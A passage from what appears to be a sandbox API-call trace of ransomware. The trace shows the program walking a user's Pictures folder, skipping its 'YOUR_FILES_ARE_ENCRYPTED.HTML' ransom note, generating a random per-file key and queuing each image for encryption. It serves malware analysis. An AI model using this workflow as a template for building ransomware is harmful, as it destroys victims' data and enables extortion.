ftLastWriteTime.dwLowDateTime=0xc3d59670, ftLastWriteTime.dwHighDateTime=0x1d7e096, nFileSizeHigh=0x0, nFileSizeLow=0xffe1, dwReserved0=0x0, dwReserved1=0x60, cFileName="1ZWvVhvziyMt_nXcJ.gif", cAlternateFileName="1ZWVVH~1.GIF")) returned 1 [0168.142] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\1ZWvVhvziyMt_nXcJ.gif") returned 67 [0168.142] lstrcmpW (lpString1="1ZWvVhvziyMt_nXcJ.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.142] PathFindExtensionW (pszPath="1ZWvVhvziyMt_nXcJ.gif") returned=".gif" [0168.142] lstrlenW (lpString=".gif") returned 4 [0168.142] PathFindExtensionW (pszPath="1ZWvVhvziyMt_nXcJ.gif") returned=".gif" [0168.142] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\1ZWvVhvziyMt_nXcJ.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\1zwvvhvziymt_nxcj.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e0 [0168.143] GetFileSizeEx (in: hFile=0x5e0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=65505) returned 1 [0168.143] GetProcessHeap () returned 0x270000 [0168.143] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7640300 [0168.146] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="43") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="58") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="38") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="30") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="60") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="25") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="C6") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="49") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="E1") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="6E") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="E1") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="F3") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="88") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="F3") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="36") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="5E") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="67") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="0F") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="43") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="8E") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="BF") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="AA") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="C2") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="8B") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="BC") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="4E") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="A4") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="A2") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="F0") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="49") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="90") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="60") returned 2 [0168.148] lstrcpyW (in: lpString1=0x76503b4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\1ZWvVhvziyMt_nXcJ.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\1ZWvVhvziyMt_nXcJ.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\1ZWvVhvziyMt_nXcJ.gif" [0168.148] CreateIoCompletionPort (FileHandle=0x5e0, ExistingCompletionPort=0x3a0, CompletionKey=0x7640300, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.148] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7640300, lpOverlapped=0x7640300) returned 1 [0168.148] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd562240, ftCreationTime.dwHighDateTime=0x1d7ddcc, ftLastAccessTime.dwLowDateTime=0x8992cf0, ftLastAccessTime.dwHighDateTime=0x1d7e4ec, ftLastWriteTime.dwLowDateTime=0x8992cf0, ftLastWriteTime.dwHighDateTime=0x1d7e4ec, nFileSizeHigh=0x0, nFileSizeLow=0x146fc, dwReserved0=0x0, dwReserved1=0x60, cFileName="aITse3WKP.png", cAlternateFileName="AITSE3~1.PNG")) returned 1 [0168.148] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\aITse3WKP.png") returned 59 [0168.148] lstrcmpW (lpString1="aITse3WKP.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.148] PathFindExtensionW (pszPath="aITse3WKP.png") returned=".png" [0168.148] lstrlenW (lpString=".png") returned 4 [0168.148] PathFindExtensionW (pszPath="aITse3WKP.png") returned=".png" [0168.148] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\aITse3WKP.png" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\aitse3wkp.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5dc [0168.149] GetFileSizeEx (in: hFile=0x5dc, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=83708) returned 1 [0168.149] GetProcessHeap () returned 0x270000 [0168.149] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x750a170 [0168.152] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="62") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="8B") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="DA") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="D8") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="56") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="07") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="FA") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="D7") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="3A") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="09") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="79") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="FC") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="F1") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="F5") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="B2") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="CD") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="D5") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="6F") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="09") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="A3") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="CB") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="10") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="FD") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="19") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="F6") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="C2") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="62") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="00") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="89") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="8D") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="C9") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="3E") returned 2 [0168.154] lstrcpyW (in: lpString1=0x751a224, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\aITse3WKP.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\aITse3WKP.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\aITse3WKP.png" [0168.154] CreateIoCompletionPort (FileHandle=0x5dc, ExistingCompletionPort=0x3a0, CompletionKey=0x750a170, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.154] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x750a170, lpOverlapped=0x750a170) returned 1 [0168.154] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eb243d0, ftCreationTime.dwHighDateTime=0x1d7e52e, ftLastAccessTime.dwLowDateTime=0xf2819160, ftLastAccessTime.dwHighDateTime=0x1d7e6ac, ftLastWriteTime.dwLowDateTime=0xf2819160, ftLastWriteTime.dwHighDateTime=0x1d7e6ac, nFileSizeHigh=0x0, nFileSizeLow=0x5d0, dwReserved0=0x0, dwReserved1=0x60, cFileName="axKsNotAR2.png", cAlternateFileName="AXKSNO~1.PNG")) returned 1 [0168.154] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\axKsNotAR2.png") returned 60 [0168.154] lstrcmpW (lpString1="axKsNotAR2.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.154] PathFindExtensionW (pszPath="axKsNotAR2.png") returned=".png" [0168.154] lstrlenW (lpString=".png") returned 4 [0168.154] PathFindExtensionW (pszPath="axKsNotAR2.png") returned=".png" [0168.154] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\axKsNotAR2.png" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\axksnotar2.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d8 [0168.155] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=1488) returned 1 [0168.155] GetProcessHeap () returned 0x270000 [0168.155] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75322c8 [0168.158] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="FC") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="F5") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="07") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="D1") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="9E") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="9A") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="02") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="69") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="DD") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="CA") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="0E") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="89") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="08") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="44") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="0D") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="F6") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="AE") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="CE") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="3B") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="AF") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="52") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="96") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="B3") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="34") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="77") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="A6") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="78") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="94") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="43") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="4C") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="18") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="54") returned 2 [0168.160] lstrcpyW (in: lpString1=0x754237c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\axKsNotAR2.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\axKsNotAR2.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\axKsNotAR2.png" [0168.160] CreateIoCompletionPort (FileHandle=0x5d8, ExistingCompletionPort=0x3a0, CompletionKey=0x75322c8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.160] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75322c8, lpOverlapped=0x75322c8) returned 1 [0168.160] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e10d30, ftCreationTime.dwHighDateTime=0x1d7d824, ftLastAccessTime.dwLowDateTime=0x12e3c8a0, ftLastAccessTime.dwHighDateTime=0x1d7db55, ftLastWriteTime.dwLowDateTime=0x12e3c8a0, ftLastWriteTime.dwHighDateTime=0x1d7db55, nFileSizeHigh=0x0, nFileSizeLow=0x11e9c, dwReserved0=0x0, dwReserved1=0x60, cFileName="BiDOMKYS_7eYkJlO7mV.png", cAlternateFileName="BIDOMK~1.PNG")) returned 1 [0168.160] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\BiDOMKYS_7eYkJlO7mV.png") returned 69 [0168.160] lstrcmpW (lpString1="BiDOMKYS_7eYkJlO7mV.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.160] PathFindExtensionW (pszPath="BiDOMKYS_7eYkJlO7mV.png") returned=".png" [0168.160] lstrlenW (lpString=".png") returned 4 [0168.160] PathFindExtensionW (pszPath="BiDOMKYS_7eYkJlO7mV.png") returned=".png" [0168.160] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\BiDOMKYS_7eYkJlO7mV.png" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\bidomkys_7eykjlo7mv.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d4 [0168.161] GetFileSizeEx (in: hFile=0x5d4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=73372) returned 1 [0168.161] GetProcessHeap () returned 0x270000 [0168.161] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x755a420 [0168.165] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="53") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="5E") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="A6") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="82") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="CC") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="C0") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="BA") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="57") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="12") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="77") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="E0") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="31") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="31") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="FC") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="83") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="01") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="F4") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="96") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="FD") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="C9") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="87") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="07") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="59") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="06") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="42") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="62") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="E1") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="AE") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="86") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="B7") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="45") returned 2 [0168.166] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="12") returned 2 [0168.166] lstrcpyW (in: lpString1=0x756a4d4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\BiDOMKYS_7eYkJlO7mV.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\BiDOMKYS_7eYkJlO7mV.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\BiDOMKYS_7eYkJlO7mV.png" [0168.166] CreateIoCompletionPort (FileHandle=0x5d4, ExistingCompletionPort=0x3a0, CompletionKey=0x755a420, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.166] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x755a420, lpOverlapped=0x755a420) returned 1 [0168.166] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x936540, ftCreationTime.dwHighDateTime=0x1d7dd79, ftLastAccessTime.dwLowDateTime=0xaf5ab820, ftLastAccessTime.dwHighDateTime=0x1d7e50e, ftLastWriteTime.dwLowDateTime=0xaf5ab820, ftLastWriteTime.dwHighDateTime=0x1d7e50e, nFileSizeHigh=0x0, nFileSizeLow=0x18b4a, dwReserved0=0x0, dwReserved1=0x60, cFileName="DZm0D9mWkUWh0_9o4.gif", cAlternateFileName="DZM0D9~1.GIF")) returned 1 [0168.166] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\DZm0D9mWkUWh0_9o4.gif") returned 67 [0168.166] lstrcmpW (lpString1="DZm0D9mWkUWh0_9o4.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.166] PathFindExtensionW (pszPath="DZm0D9mWkUWh0_9o4.gif") returned=".gif" [0168.166] lstrlenW (lpString=".gif") returned 4 [0168.166] PathFindExtensionW (pszPath="DZm0D9mWkUWh0_9o4.gif") returned=".gif" [0168.166] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\DZm0D9mWkUWh0_9o4.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\dzm0d9mwkuwh0_9o4.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d0 [0168.167] GetFileSizeEx (in: hFile=0x5d0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=101194) returned 1 [0168.167] GetProcessHeap () returned 0x270000 [0168.167] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7582578 [0168.171] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="AF") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="0C") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="1C") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="C2") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="68") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="F9") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="B1") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="F3") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="06") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="EB") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="44") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="08") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="14") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="62") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="06") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="9C") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="FF") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="B3") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="D3") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="92") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="FB") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="24") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="EF") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="F0") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="68") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="3F") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="F1") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="D9") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="E5") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="37") returned 2 [0168.172] wsprintfW 